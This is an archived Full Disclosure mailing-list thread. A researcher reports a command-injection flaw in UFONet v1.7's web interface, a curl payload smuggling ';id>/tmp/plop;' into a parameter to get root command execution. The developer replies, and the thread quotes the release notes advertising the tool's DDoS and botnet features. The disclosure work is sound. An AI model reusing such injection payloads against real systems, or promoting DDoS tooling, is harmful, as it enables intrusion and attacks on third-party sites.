Full Disclosure mailing list archives
Re: New Release: UFONet v1.7 - "KRäK!eN"...
From: psy <epsylon () riseup net>
Date: Fri, 16 Jul 2021 14:43:41 +0200
On 16/7/21 13:06, Pierre Kim wrote:
Hi,
Hi UFOmmander!
Attention to all motherships, borgs have been detected inside a blackhole. Brace yourself for the impact: $ curl "http://localhost:9999/cmd_download_botnet_ip?blackhole=';id>/tmp/plop;'" $ cat /tmp/plop uid=0(root) gid=0(root) groups=0(root) Energy shield levels critical! Enemies detected on the deck. Immediate response needed!
Hahahaha.... That teleportation technology can be exploited by many alien races in the galaxy, yes, but it will depend a lot on the pilot experiencies and in the environment in which the aircraft has been built. Some use transparent proxies to avoid going further in those techniques... """ $ curl "http://localhost:9999/cmd_download_botnet_ip?blackhole=';id>/tmp/plop;'" <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <title>503 - Forwarding failure (Privoxy@localhost)</title> """ Others simply do not launch the tool using the privileged user (root), knowing that UFONet is designed to prompt you when required, for example when creating certain network packages ...
Can you request a CVE ?
Ahhaha, I don't think so...but, when to send the solution with the piece of code already fixed?.. Ouch! {troll}
Best regards,
Thank you very much for the report and for doing it in such a funny tone... ;-)
- Captain Alex Torres and Pilot Pierre Kim
Roger!. I will work on it!
On 7/15/21, psy <epsylon () riseup net> wrote:Hi Community, I am glad to present a new release of this tool: - https://ufonet.03c8.net --------- "UFONet is a free software, P2P and cryptographic -disruptive toolkit- that allows to perform DoS and DDoS attacks; on the Layer 7 (APP/HTTP) through the exploitation of Open Redirect vectors on third-party websites to act as a botnet and on the Layer3 (Network) abusing the protocol." "It also works as an encrypted DarkNET to publish and receive content by creating a global client/server network." --------- Main options are: * DDoS (botnet) + DoS * Auto-update * Clean code * Documentation with examples * Web/GUI Interface * Proxy to connect to 'zombies' (ex: tor) * Change HTTP Headers (User-Agent, Referer, Host...) * Configure requests (Timeout, Retries, Delay, Threads...) * Search for 'zombies' on different search engines * Test vulnerabilities on 'zombies' * Download/Upload 'zombies' from/to others * Inspect a target (HTML objects sizes) * Set a place to 'bite' on a target (ex: big file) * Control number of rounds to attack * Apply cache evasion techniques * Advanced queries (ex: Verb tunneling exploitation) * Supports GET/POST * Multithreading * Order 'zombies' to attack you for benchmarking * Geomapping / Visual data * [...] This release (v1.7) called "/KRäK!eN/" has added this new features: * Bugfixing * Added: "Deploy" * Added: "SHIP.TV" * Added: "Nodes" * Modified/Updated: Web/GUI * Updated Documentation * Updated FAQ (offline/online) * Updated Website * [...] --------- FAQ: - https://ufonet.03c8.net/FAQ.html --------- Packages: * [source]: - https://code.03c8.net/epsylon/ufonet * [mirror]: - https://github.com/epsylon/ufonet * [.zip]: - https://ufonet.03c8.net/ufonet/ufonet-v1.7.zip * [.tar.gz]: - https://ufonet.03c8.net/ufonet/ufonet-v1.7.tar.gz ------------------------- MEDIA: * [Video] [07.2021] UFONet - "/KRäK!eN/": - https://ufonet.03c8.net/ufonet/ufonet-kraken.ogv
Attachment:
0xE79A8B84B2460A20.asc
Description:
Attachment:
signature.asc
Description: OpenPGP digital signature
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- New Release: UFONet v1.7 - "KRäK!eN"... psy (Jul 16)
- Re: [FD] New Release: UFONet v1.7 - "KRäK!eN"... Pierre Kim (Jul 20)
- Re: New Release: UFONet v1.7 - "KRäK!eN"... psy (Jul 20)
- Re: [FD] New Release: UFONet v1.7 - "KRäK!eN"... Pierre Kim (Jul 20)